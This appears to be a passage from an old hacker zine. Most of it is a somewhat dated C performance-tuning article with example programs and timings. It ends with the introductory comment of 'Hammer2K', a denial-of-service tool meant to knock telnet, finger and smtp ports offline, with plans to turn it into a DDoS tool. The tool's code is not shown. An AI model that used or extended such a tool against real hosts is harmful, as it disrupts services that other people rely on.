In the first model, 1,024 system calls have to be made and a seperate disk
operation has to be made for each one of those. In other words, the hard
drive platters have to spin to the requested position of the file on disk
for each individual read() call. Here's a real-world example of buffering
efficency:
[super@ufo super]$ perl -e 'print "A"x65535;' > /tmp/test
[super@ufo super]$ cat prog1.c
#include<stdlib.h>
#include<fcntl.h>
int main(void){
int fd;
unsigned char c;
register unsigned short cnt;
if((fd=open("/tmp/test",O_RDONLY))<0){
exit(EXIT_FAILURE);
}
cnt=0;
for(cnt=0;cnt<65535;cnt++){
read(fd,&c,1);
}
exit(EXIT_SUCCESS);
} }
[super@ufo super]$ cc -o prog1 prog1.c
[super@ufo super]$ cat prog2.c
#include<stdlib.h>
#include<fcntl.h>
int main(void){
int fd;
unsigned char c;
char buf[65535];
if((fd=open("/tmp/test",O_RDONLY))<0){
exit(EXIT_FAILURE);
}
read(fd,&buf,65535);
exit(EXIT_SUCCESS);
}
[super@ufo super]$ cc -o prog2 prog2.c
[super@ufo super]$ time ./prog1
0.06user 0.05system 0:00.10elapsed 108%CPU (0avgtext+0avgdata
0maxresident)k
0inputs+0outputs (75major+9minor)pagefaults 0swaps
[super@ufo super]$ time ./prog2
0.00user 0.00system 0:00.00elapsed 0%CPU (0avgtext+0avgdata 0maxresident)k
0inputs+0outputs (75major+24minor)pagefaults 0swaps
Buffer efficiency is noticable even at 448.92 BogoMIPS. Obviously, prog1
is frivolously wasting resources. Although prog2 has to allocate memory
for the character array, this is a fair trade for extraneous disk activity
and wasted CPU cycles. Most buffers will have a short lifespan and may be
freed rather quickly. Thus, the used memory will have little or no effect
on operation.
Be careful when utilizing this technique. If any of the memory space of
the allocated buffer is swapping, this method's purpose has been defeated.
Why read from the disk when an immediate write of identical data is
pending? In short, don't use excessively large buffers.
Loop unrolling
--------------
Loop unrolling is the expansion of consolidated recurring code. A decent
amount of processing can be eradicated by spreading out loop code. Loop
unrolling cut back on incremental math, memory used by integers for
counting, and ASM instructions that handle recursion (JMP, JBE, etc.)
/* Hence, */
while(cnt<1000){
puts("Hello World");
puts("Hello World");
puts("Hello World");
puts("Hello World");
puts("Hello World");
puts("Hello World");
puts("Hello World");
puts("Hello World");
puts("Hello World");
puts("Hello World");
cnt+=10;
}
/* is superior to */
while(cnt<1000){
puts("Hello World");
cnt++;
}
Lazy programmers may use the -funroll-loops option of egcs.
Bitfields
---------
Often, a coder may need to set an on/off flag for use in a conditional
statement. The disturbing part is that most coders declare an integer with
which to do this. How stupid. How lame. How wasteful. This has already
been done with base 2 (binary). Instead of allocating the sizeof(int),
usually four bytes (32 bits), perform the operation with a single bit.
This can be accomplished using structures.
struct bitfields {
int flag1 : 1;
}
The preceding structure decleration tells the compiler to set aside one
bit for the flag1 variable. This syntax may also be applied when declaring
an integer with a known value limit. For example, a variable used for
counting that never exceeds 15 would only need a nibble to do its job.
Therefore, it may be declared within a structure as so: "int flag : 4;".
Anyone with bits and bytes mentality knows that a nibble is half a byte.
On most architectures, a byte is 8 bits so a nibble is 4 bits. Only 4 bits
are needed to count to fifteen because of binary fundamentals: 1 + 2 + 4 +
8 = 15.
LWPs
----
Lightweight processes, otherwise known as threads, can make use of the
wasted time that a program spends blocking, or sitting idle while waiting
for a certain event. Additionally, threads can extinguish the overhead of
creating a new, "heavyweight" process. Lightweight processes share
memory space with the main process, consequently throwing IPC
(Inter-Process Communication) out the window. Hence, the Linux move towards
clone().
Optimization through debugging
------------------------------
Examining the output of programs such as strace, ltrace, ktrace, and truss can
aid in the discovery of superflous system and library calls, ASM commands,
etc. In general, the less output generated by a tracing debugger, the more
efficient the code.
Ramdisks
--------
A ramdisk, as the name implies, is a filesystem in RAM. Ramdisks have a
multitude of optimization applications; the implementation of a speedy
cache system and minimizing the cost of dynamic configuration files, to
name a few. Any sensible computer user knows that reading from RAM is
remarkably faster than reading from disk. Summaraziation of ramdisk usage
will not be provided. Other documents fully address this subject.
Registers
---------
Variables with frequent usage should be declared with the register keyword;
examples are loop counters and character pointers used for intricate lexical
analyzation. A classic case is illustrated in the "Buffering I/O" section
above.
This rule of thumb should be known by programmers even with a rather small
amount of experience with C.
Resources
---------
FTP: ftp.debian.org /debian/dists/unstable/main/source/utils/ltrace_*
FTP: scitsc.wlv.ac.uk /pub/cprog/prog.course.wlv./chapter.12
WWW: http://rpmfind.net/linux/RPM/Development_Debuggers.html
WWW: http://centaurus.cs.umass.edu/~wagner/threads_html/tutorial.htm
WWW: http://www.abarnett.demon.co.uk/tutorial.html
USENET: comp.lang.c, comp.programming.threads
Manual pages: ltrace(1), strace(1), ktrace(1), truss(1)
[Hammer2K]===============================================================[Threx]
/* Hammer2K ver 1.0 BETA by Threx (threx@attrition.org)
I'm new to socket programming... So bare with me. Hammer2K is a simple DoS
attack tool that will kill a port by rapidly opening a port and sending
a burst of data. It affects major ports such as telnet, finger, and smtp.
Because inetd checks the status of these ports, it will restart in 10
minutes. So, I have armageddon mode that will keep killing it for an hour.
Problems:
If the victim has more bandwidth, it can't be killed. You can have
a group of people to take it out, but I haven't tested that theory.
Coming Up:
Hammer2K will soon be a DDoS attack tool.
Hopefully more ports will be found that are affected.
Compile:
gcc hammer2k.c -o hammer2k
Greets:
#svun on undernet, LoU, APHC <aphc.cjb.net>